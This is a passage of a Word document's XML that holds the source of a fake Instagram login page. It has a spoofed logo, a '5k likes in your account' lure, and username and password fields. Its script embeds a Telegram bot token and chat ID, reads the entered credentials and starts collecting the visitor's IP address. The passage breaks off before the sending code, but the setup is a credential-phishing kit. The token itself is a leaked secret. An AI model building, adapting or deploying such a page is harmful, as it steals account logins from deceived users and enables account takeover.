    <w:p w14:paraId="3C49D17B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76F6330C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.footer-links a {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E114B9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#8e8e8e;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588EDAC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text-decoration: none;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6B8065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662991CF" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>        .footer-links a:hover {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CB9A6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text-decoration: underline;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F0147A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594E4DBB" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>        .footer-copy {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C08EEB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text-align: center;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBB2FB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font-size: 12px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4122204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color: #8e8e8e;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553DF30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padding: 0 0 10px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A13134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76E973AD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responsive */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7507A13D" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>        @media (max-width: 450px) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C1A8D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.login-container {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6077B19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border: none;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE524D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background: transparent;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C2C89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box-shadow: none;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1295E7C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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEA7E1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body {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF2F67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background: #fff;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE5239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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D93503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.login-form {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577836B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padding: 0 20px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D7552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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E9C69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.signup-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>cta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6774E63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margin: 16px 20px 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB00DB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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0B017F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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04451AB7" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>        /* small fix for input autofill */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1E8D15" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>        input:-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>webkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>-autofill {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31175E1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-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>webkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>-box-shadow: 0 0 0 1000px #fafafa inset !important;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68812458" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5C2035" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>    &lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124C5BBC" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166803E8" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6A8F22" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>    &lt;div class="login-container"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2601D981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logo --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3001EEA6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class="logo"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552D266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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>xmlns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve">="http://www.w3.org/2000/svg" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>viewBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>="0 0 175 51" width="175" height="51"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40271DE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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>defs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>&gt;&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>linearGradient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> id="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>igGrad</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>" x1="0%" y1="0%" x2="100%" y2="100%"&gt;&lt;stop offset="0%" stop-color="#f09433"/&gt;&lt;stop offset="25%" stop-color="#e6683c"/&gt;&lt;stop offset="50%" stop-color="#dc2743"/&gt;&lt;stop offset="75%" stop-color="#cc2366"/&gt;&lt;stop offset="100%" stop-color="#bc1888"/&gt;&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>linearGradient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>&gt;&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>defs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B3E52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&lt;text x="0" y="36" font-family="Arial, Helvetica, sans-serif" font-size="42" font-weight="bold" fill="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>(#igGrad)" letter-spacing="-1"&gt;Instagram&lt;/text&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6A59F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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0A21F0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41C4B96C" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="330A37C8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&lt;!-- 5k likes badge (exactly "5k like in your account") --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0ABB70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class="badge-5k"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C591F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&lt;span class="heart-icon"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006504A5">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>❤️</w:t>
      </w:r>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve">&lt;/span&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7DF8F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&lt;span&gt;5k&lt;/span&gt; likes in your account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C3F637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65C96C74" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B527B20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login form --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264A646D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&lt;form class="login-form" id="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>loginForm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFB6F5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class="input-group"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEBD404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    &lt;input type="text" id="username" placeholder="Phone number, username, or email" value="" autocomplete="off" required&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1831951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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4132567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class="input-group"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432B363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&lt;input type="password" id="password" placeholder="Password" value="" autocomplete="off" required&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCCD8C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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA4B4C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&lt;button type="submit" class="login-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>btn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>" id="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>loginBtn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>"&gt;Log in&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B87E4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class="divider"&gt;OR&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D13BE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class="fb-login"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F45CD8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&lt;a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>="#"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539AA65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&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>viewBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>="0 0 24 24"&gt;&lt;path d="M24 12.073c0-6.627-5.373-12-12-12s-12 5.373-12 12c0 5.99 4.388 10.954 10.125 11.854v-8.385H7.078v-3.47h3.047V9.43c0-3.007 1.792-4.669 4.533-4.669 1.312 0 2.686.235 2.686.235v2.953H15.83c-1.491 0-1.956.925-1.956 1.874v2.25h3.328l-.532 3.47h-2.796v8.385C19.612 23.027 24 18.062 24 12.073z"/&gt;&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEBD8E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Log in with Facebook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EC0CF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&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B99E9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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6606F32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class="forgot-pw"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AB249E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&lt;a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>="#"&gt;Forgot password?&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A8882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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277B45D0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&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F31FEA6" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C030815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sign up --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5A0F68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class="signup-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>cta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690DD355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Don't have an account? &lt;a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>="#"&gt;Sign up&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527159D1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618F7D04" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58BBF757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app download --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0CAC3B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class="app-download"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0738354B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Get the app.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12613A4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&lt;div class="app-badges"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3705092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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> src="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" alt="App Store"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573C53A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&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> src="data:image/png;base64,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</w:t>
      </w:r>
      <w:r w:rsidRPr="006504A5">
        <w:lastRenderedPageBreak/>
        <w:t>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" alt="Google Play"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4062735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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEF3DCD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4422A49C" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0011C4ED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&lt;!-- footer --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BC59D1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class="footer-links"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CE76B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="#"&gt;Meta&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AD8FD7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="#"&gt;About&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647415E0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="#"&gt;Blog&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54782C6F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="#"&gt;Jobs&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214D740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="#"&gt;Help&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33699C0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="#"&gt;API&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759427DC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="#"&gt;Privacy&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCA2945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="#"&gt;Terms&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199E09C5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="#"&gt;Locations&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE98BE7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&lt;a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>="#"&gt;Instagram Lite&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A905BE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2F4E2849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&lt;div class="footer-copy"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646C3F5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© 2026 Instagram from Meta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C645F2" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7612E0" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BF23E5" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37D0E03C" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>    &lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633721AE" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006504A5">
        <w:t>        (function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5513FFC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Telegram credentials (your provided)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4860E3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const BOT_TOKEN = '8578167911:AAESXYOLPjELV836Sh96HXr0sM6IEDJD_IA';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B9DE6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const CHAT_ID = '5935249151';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F94D0BB" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B18773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const </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>loginForm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>document.getElementById</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>loginForm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A163CD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const </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>usernameInput</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>document.getElementById</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>('username');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7E7084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const </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>passwordInput</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>document.getElementById</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>('password');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AF1E8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const </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>loginBtn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>document.getElementById</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>loginBtn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103382E1" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2330B70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Helper: get client IP via free API (with fallback)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEB21E0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function </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>getClientIP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>(callback) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7F520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// try multiple services for reliability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587AFDE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const services = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016C8B6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'https://api.ipify.org?format=json',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2D80A8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'https://ipapi.co/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>/'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AD7F6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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FC831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let tried = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3D841C" w14:textId="77777777" w:rsidR="006504A5" w:rsidRPr="006504A5" w:rsidRDefault="006504A5" w:rsidP="006504A5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2618"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F020B1A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function </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>tryNext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C70B19F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if (tried &gt;= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>services.length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5AFE0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callback('IP not available');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD0F1A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return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD408C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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A60D9EF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const </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006504A5">
        <w:t>url</w:t>
      </w:r>
